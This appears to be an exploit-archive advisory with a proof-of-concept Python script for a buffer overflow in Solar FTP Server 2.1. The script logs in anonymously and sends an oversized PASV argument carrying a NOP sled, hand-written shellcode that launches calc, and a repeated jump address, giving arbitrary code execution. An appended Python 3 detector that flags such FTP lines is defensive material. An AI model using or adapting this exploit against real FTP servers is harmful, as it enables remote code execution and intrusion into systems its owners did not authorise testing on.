
Solar FTP Server 2.1 Buffer Overflow

Posted on 11 January 2011

# ------------------------------------------------------------------------
# Software................Solar FTP Server 2.1
# Vulnerability...........Buffer Overflow
# Download................http://www.solarftp.com/
# Release Date............1/10/2011
# Tested On...............Windows XP SP3 EN
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://www.johnleitch.net/
# Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
#
# --Description--
#
# A buffer overflow in Solar FTP Server 2.1 can be exploited to execute
# arbitrary code.
#
#
# --PoC--

import socket

host = 'localhost'
port = 21

jmp_eax = '\xBF\x66\x02\x10'
junk = '\xCC\xCC\xCC\xCC'
nop_sled = '\x90\x90\x90' + '\x90\x90\x90\x90' * 2

# Calc shellcode by yours truly. Check the task manager
# as the calc instance will not be visible.
shell_code = "\x31\xC9"\
             "\x51"\
             "\x68\x63\x61\x6C\x63"\
             "\x54"\
             "\xB8\xC7\x93\xC2\x77"\
             "\xFF\xD0"

junk2 = 'A' * 7004

bad_stuff = junk + nop_sled + shell_code + jmp_eax * 249 + junk2

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(8)

print 'connecting'

s.connect((host, port))

print s.recv(8192)

s.send('USER anonymous\r\n')
print s.recv(8192)

s.send('PASS x@x.com\r\n')
print s.recv(8192)

s.send('PASV ' + bad_stuff + '\r\n')
print s.recv(8192)

s.close()
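Detection note, added here as an example and not part of the original advisory or the author's code: RFC 959 defines PASV with no argument, so the control-channel line the PoC sends stands out on shape alone. The Python 3 sketch below flags such lines; the 512-byte cap, the ASCII-only argument check, the function names and the sample session are assumptions constructed for illustration.

```python
# Added defensive example: flag FTP control-channel lines shaped like the
# PoC's PASV request (argument on a no-argument command, oversized line,
# non-printable bytes). Not taken from the advisory.

MAX_LINE = 512  # assumption: generous cap for a legitimate command line
# Commands that RFC 959 defines without any argument.
NO_ARG_COMMANDS = {b"PASV", b"PWD", b"QUIT", b"NOOP", b"SYST", b"CDUP"}


def inspect_command(line: bytes) -> list:
    """Return the reasons a raw FTP command line looks anomalous."""
    reasons = []
    body = line.rstrip(b"\r\n")
    verb, _, arg = body.partition(b" ")
    verb = verb.upper()
    if len(body) > MAX_LINE:
        reasons.append("line length %d exceeds %d" % (len(body), MAX_LINE))
    if verb in NO_ARG_COMMANDS and arg.strip():
        reasons.append("%s takes no argument" % verb.decode("ascii", "replace"))
    # Assumption: arguments are plain ASCII; relax this on UTF-8 servers.
    if any(b < 0x20 or b > 0x7E for b in arg):
        reasons.append("non-printable bytes in argument")
    return reasons


def scan(lines):
    """Yield (index, reasons) for every anomalous line in a session."""
    for i, line in enumerate(lines):
        reasons = inspect_command(line)
        if reasons:
            yield i, reasons


# Constructed sample session. The last line only mimics the PoC's shape
# (oversized PASV argument with non-ASCII filler); it carries no payload.
SAMPLE = [
    b"USER anonymous\r\n",
    b"PASS x@x.com\r\n",
    b"PASV\r\n",
    b"PASV " + b"\x90" * 16 + b"A" * 7004 + b"\r\n",
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE):
        print(idx, "; ".join(why))
```

The same three checks can be enforced inline by an FTP-aware proxy or expressed as an IDS rule on port 21 traffic.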

 
